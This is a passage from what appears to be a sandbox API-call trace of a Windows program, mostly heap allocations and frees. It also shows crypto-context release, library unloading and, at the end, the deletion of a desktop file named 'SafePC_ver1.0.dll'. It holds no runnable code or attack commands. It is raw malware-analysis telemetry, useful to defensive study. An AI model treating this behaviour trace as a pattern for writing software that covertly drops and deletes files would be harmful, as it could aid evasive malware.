dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0206.218] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0206.218] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.218] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0206.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.219] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0206.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0206.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0206.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0206.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0206.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0206.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0206.219] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.219] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0206.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0206.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0206.219] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0206.220] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0206.220] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0206.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0206.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0206.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0206.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0206.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0206.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0206.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0206.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0206.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0206.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0206.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0206.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0206.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0206.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0206.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0206.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0206.222] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0206.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0206.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0206.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0206.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0206.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0206.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0206.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0206.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0206.222] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0206.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0206.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0206.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0206.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0206.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0206.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0206.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0206.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0206.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0206.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0206.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0206.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0206.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0206.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0206.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0206.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0206.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0206.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0206.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0206.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0206.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0206.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0206.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0206.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0206.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0206.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0206.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0206.224] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0206.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0206.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0206.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0206.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0206.225] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0206.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0206.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0206.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0206.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0206.225] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0206.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0206.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0206.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0206.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0206.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0206.225] FreeLibrary (hLibModule=0x756e0000) returned 1 [0206.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0206.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0206.225] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0206.225] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0206.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0206.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0206.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0206.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0206.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0206.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0206.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0206.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0206.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0206.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0206.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0206.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0206.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0206.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0206.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0206.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0206.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0206.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0206.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0206.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0206.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0206.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0206.226] CloseHandle (hObject=0x2d0) returned 1 [0206.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0206.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0206.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0206.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0206.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0206.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0206.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0206.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0206.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0206.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0206.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0206.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0206.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0206.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0206.228] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0206.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0206.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0206.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0206.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0206.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0206.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0206.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0206.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0206.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0206.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0206.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0206.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0206.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0206.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0206.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0206.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0206.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0206.229] CloseHandle (hObject=0x2a0) returned 1 [0206.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0206.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0206.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0206.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0206.241] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0206.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0206.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0206.241] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0206.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0206.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0206.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0206.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0206.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0206.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0206.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0206.326] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/SafePC_ver1.0.dll", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll", lpFilePart=0x8cedf4*="SafePC_ver1.0.dll") returned 0x29 [0206.326] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\safepc_ver1.0.dll")) returned 0x20 [0206.326] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd42a9d0f, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd42a9d0f, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd42cff4e, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="SafePC_ver1.0.dll", cAlternateFileName="SAFEPC~1.DLL")) returned 0xa874d0 [0206.327] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\SafePC_ver1.0.dll" 